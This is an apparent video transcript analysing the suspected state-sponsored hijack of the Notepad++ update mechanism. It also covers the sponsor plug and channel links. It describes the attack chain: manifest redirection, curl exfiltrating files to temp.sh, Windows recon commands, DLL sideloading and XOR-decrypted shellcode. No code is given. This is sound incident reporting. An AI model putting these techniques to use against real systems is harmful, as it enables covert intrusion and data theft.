notepad++ situation is crazy

I know what you were thinking, okay? You were really hoping that they were going to install Copilot into Notepad. And then you were really hoping that when you went to go use Copilot and Notepad, you had to log into Notepad with your Microsoft account. I know, listen, Microsoft's got you covered. It's okay. But if you're not into those features, which like I don't know why you wouldn't be, but if you're not into those features, you can always use the go-to replacement, Notepad++, except the fact that Notepad++ has been hacked sort of. There's a lot of, I think, fear-mongering, maybe some fear stuff going on with Notepad++. It has been hacked in a certain way, but not normally, not the way we normally see hacks. Okay, so Notepad++ users, take note. It's time to check to see if you're hacked. Suspected China State hackers use update infrastructure to deliver a backdoor version. So, very interesting thing we have going on here. we see a threat actor using a vulnerability in the way that Notepad++ does updating to target a very small specific group of individuals and not do some kind of like mass exploitation of Notepad++. Now, I want to kind of highlight what's neat about this is Kevin Bowmont, if I mispronounced your name, Kevin, I'm very sorry, but he actually wrote up this report in December of last year where he collects evidence going back to November of last year where he says that I've heard from three orgs now who've had security incidences on boxes with Notepad++ installed where it appears Notepad++ processes have spawned the initial access. These have resulted in handson keyboard threat actors. Meaning it's not a threat actor where like you have some kind of info stealer or like a crypto miner where it's all automated so that the actor doesn't have to do anything. It is such a highdetail operation on the part of the thread actor. They have somebody manually running the operation like with their hands hands on keyboard. Right? This means this is very targeted very specific access that this person this group is getting which is really interesting. And again it's interesting this goes back to December 2nd. So what he notices in this is that there's actually a bug fix in version 8.8.8 of Notepad++ that literally the commit message is security enhancement prevent Notepad++ updater from being hijacked which is not great. Now as he he highlights here and I want to make sure we're also highlighting this here. The point of this article is not to flame the very good developer of Notepad++. the way this was exploited technically like if if what we're seeing is true is some severe like nationstate level tampering of potentially with encrypted traffic which is pretty interesting. So the way that this all works goes into in great detail in his article. Please go read his article. I'm just kind of like riffing off the top of it. The Notepad++ update process uses this updater called GUPP or Windg. And the way that it works when you want to update a process or you want to update a program you have to reach out and get like a manifest file, right? like some file that tells you do you have the right version of the software? What version are we serving? Oh, and then where do you go and get that version, right? And so in the GUP manifest here, you see kind of this XML file and you'll see that we say, you know, it does need to be updated. We are serving version 8.8.8 at the time and it shows you the place where you go and get it. You go get the update for Notepad++ at github.com/nopad++ and then the long release on github.com that gets you the .exe. This is downloaded and saved in temp. Now, you may be wondering, wait a minute, if this is done over HTTPS, if this is done encrypted, like how are they able to just arbitrarily download malware onto my machine? Well, there are kind of two primary issues. First of all, originally, the traffic may have just been done over HTTP, right? And because HTTP is not only clear text traffic, but also there's no authentication with just raw HTTP, it doesn't have the authentication that the TLS layer gives you. You know, if you can intercept HTTP traffic, you could potentially either redirect the source of this file or even just modify the contents of this file to point the location to another location, right? Download a different installer. You may be asking, wait a minute, hold on. So, I get a different .exe, but that .exe wasn't compiled and signed by the original creators of Notepad++. So, why does that even matter? The downloads themselves are signed, but some earlier versions of Notepad++ use a self-signed rootert which is on GitHub with 887 the prior release. This was reverted to global sign. Global sign being a much bigger trusted root certificate authority and event effectively there was a situation where for some versions the download is not robustly checked for tampering. What is very interesting though is that after a while even we they observed I think some compromises of this happening over HTTPS which means that there is somewhere in the chain between people that are downloading Notepad++ and Notepad++ is an ISP associated with a nation state that has the ability to probably use a compromised certificate authority to intercept TLS traffic, right? Which is terrifying to think about but not impossible given the way the technology works, right? So in theory, you know, Chinese nation state supposedly sees the person they're trying to target going after this install. Okay, cool. So they know they have to go and change the the manifest location by a TLS intercept and they have that person now go download the backdoor version of Notepad++, which is really crazy. Before we keep going, today's video is sponsored by me. Guys, I honestly believe that if you are a programmer in literally any language, be it Go, Python, or JavaScript, it will make you a better programmer if you understand the fundamentals at the low level. That that's me by the way. And so I made the Level Academy just to teach you those things. My courses are designed to teach you the fundamentals of how computers work at a very low level, at a simple level, so that you can get better at programming in general. Right now, you can go and sign up for my free course here in the uh in the hero section to get free 3-day course to take, you know, a little sample of what you might get. Or you can go into the preview of the zero to her C programmer course and see what we got on the inside. You get the first lesson and the pointers lesson absolutely free. And if you make an account right now, you can go ahead and use our in browser code editor. Guys, to be a good programmer, you got to know the fundamentals and where do you learn the fundamentals on Low-level Academy. Okay, back to the video. Based off of Kevin's analysis, what he's saying is that the the update for the actual the security patch is not only did he change I think some of the you know probably plain text encryption on HTTP and some other stuff, he also said forced download domain, right? meaning that you can only get Notepad++ from this URL, which means likely that like the front end of of this GUP manifest was being replaced with like some malicious URL that allowed you to go that that that pulled down the malware, right? Which is pretty interesting. And then so what would happen is you would then see from your Notepad++ instance, there were people reporting, hey, uh just out of curiosity, there is a curl binary. curl being the binary that um you know you can use to arbitrarily make web requests over HTTP and otherwise uh yeah so I saw as a child process of notepad++ curl is uploading files to temp.sh/upload sh/upload. Does anyone else know what's going on here? Oh, I'm also seeing command netstat ANO system info, task list, and who am I, which are like very traditional like initial recon on a box, right? Net stato gets you what ports are listening. Task lists obviously are what processes are running on the box and then who am I is getting you what privilege level do you have on Windows. So, uh yeah, that's like hackers are in your type commands. And again, it's crazy that this is all spawning from the Notepad++.exe exe process. Now, you know, it is possible that potentially maybe someone did DLL sideloading into Notepad++ at this time, but after enough analysis went through, people were seeing like, oh no, literally like Notepad++ was getting autoupdater.exe, which was spawning all this malicious stuff, which is just bonkers. And then Rapid 7, right, the security company behind software like metas-loit, for example, they did the analysis of kind of the entire chain of, you know, you get code execution through this and then what are they putting on on the computers and what are they doing with it? The chain looks kind of like this. It's interesting. So, they see this NSIS.NSI script, which apparently is like very common for this specific China AP. They load Bluetooth service.exe. That name likely just to like kind of blend in with the other processing on the on the computer, which is actually just a legitimate Bit Defender submission wizard, which is used for DLL sideloading. Uh DL sideloading is this technique that you use where if you have a process that looks for, you know, Apple. DLL, right? like Apple like literally just the word Apple and Apple. DLL comes legitimately with the process. If you want to have it load your DL that does malicious stuff and kind of have it blend in with the process, you can just name your DL apple.dll and put it in a folder that has a higher precedence of load order and then it'll get loaded into the service. Right? So they use that to maliciously sideloadad log DLL, a very simple word that gets loaded by Bluetooth service. Uh and then log DLL does a lot of the malicious stuff and it has the ability to uh load, decrypt and execute shell code which comes in the form of this Bluetooth service file which just an encrypted shell code blob right and they do a bunch of deexoring and denryption right it's all it's it's all exor everything every every AP you know nation state actors using exor encryption out here uh to get the uh shell code out and doing the evil stuff and then from there it just seems like traditional CNO stuff where they're doing cyber network operations to hack in and steal your data and and watch you do evil Oh yeah, and here are the op codes, right? You're able to spawn or interactive shell, you know, C2 checkin, create a process, right? Follow the disc, blah blah blah blah blah, all that good stuff. And I may be curious, why would why is China so interested in Notepad++? Hm. There's no reason that the nation of China would have anything to do with Notepad++, nor would Russia. Russia probably also would have nothing to do with that. And then then the later on the self-signed certificate thing kind of maybe uh bit him in the ass a little bit. I literally just saw this tweet by Smelly VX underground. Notepad++ says info for compromised suspects Chinese state sponsored hackard. Why would China hate Notepad++ looks inside and it's just it's literally what I just said. That's so funny, dude. Anyway, guys, that's it for now. This this hack I want to highlight is a lot more fun than the normal ones, right? Cuz normally it's just like shitwear software has vulnerability gets exploited. People download horse porn on everyone's computers and mine Monero, right? That's like been every intrusion it feels like for the last like 3 years. This is for the first time in a while an intrusion where it's like oh like it is highly targeted using a very very specific technique that is very resource intensive potentially leading to a TLS intercept to run code on their system and do like real CNO hacker right? It's really really interesting. But yeah, guys, that's it for now. Thanks for watching. I appreciate it. If you like this video, hit the sub button over here and then go check out this other video that I think you'll enjoy just as much. We'll see you in the next one. Take care.

🏫 MY COURSES Sign-up for my FREE 3-Day C Course: https://lowlevel.academy 🧙‍♂️ HACK YOUR CAREER Wanna learn to hack? Join my new CTF platform: https://stacksmash.io 🔥COME HANG OUT Check out my other stuff: https://lowlevel.tv